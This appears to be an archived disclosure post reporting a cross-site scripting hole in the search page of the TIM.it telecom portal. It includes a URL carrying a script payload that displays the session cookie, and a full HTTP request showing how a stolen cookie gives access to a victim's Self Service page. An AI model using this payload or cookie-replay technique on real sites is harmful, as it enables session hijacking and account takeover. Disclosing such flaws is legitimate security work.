TIM (Telecom Italia Mobile) is a big italian phone company. <br>The web portal TIM.it is vulnerable to XSS attacks in search function (<a href="http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">

http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do</a>). An attacker can steal cookie session and access with victim credential, inject html or arbitary script code.<br><br>Cookie view/steal:<br><br><a href="http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do?query=%3Cscript%20%0a%0d%3Ealert%28document.cookie%29%3B%3C/script%3E&amp;area=119%20Self%20Service" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">

http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do?query=%3Cscript%20%0a%0d%3Ealert(document.cookie)%3B%3C/script%3E&amp;area=119%20Self%20Service</a><br><br>Access to Self Service personal page:<br><br>Get Request to: 
<a href="https://www.tim.it/119/cruscotto/descrizioneservizi/wp.do" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">https://www.tim.it/119/cruscotto/descrizioneservizi/wp.do</a> <br><br>Host: <a href="http://www.tim.it/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
www.tim.it</a><br>User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:
<a href="http://1.8.1.4/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">1.8.1.4</a>) Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty)<br>Accept: text/xml,application/xml<div id="mb_0">,application/xhtml+xml,text/html;q=
0.9,text/plain;q=0.8,image/png,*/*;q=0.5<br>Accept-Language: it-it,it;q=
0.8,en-us;q=0.5,en;q=0.3<br>Accept-Encoding: gzip,deflate<br>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br>Keep-Alive: 300<br>Connection: keep-alive<br>Cookie: insert cookie victim</div><br clear="all"><br>-- <br>Gianni Amato
<br><a href="http://www.gianniamato.it/">http://www.gianniamato.it/</a>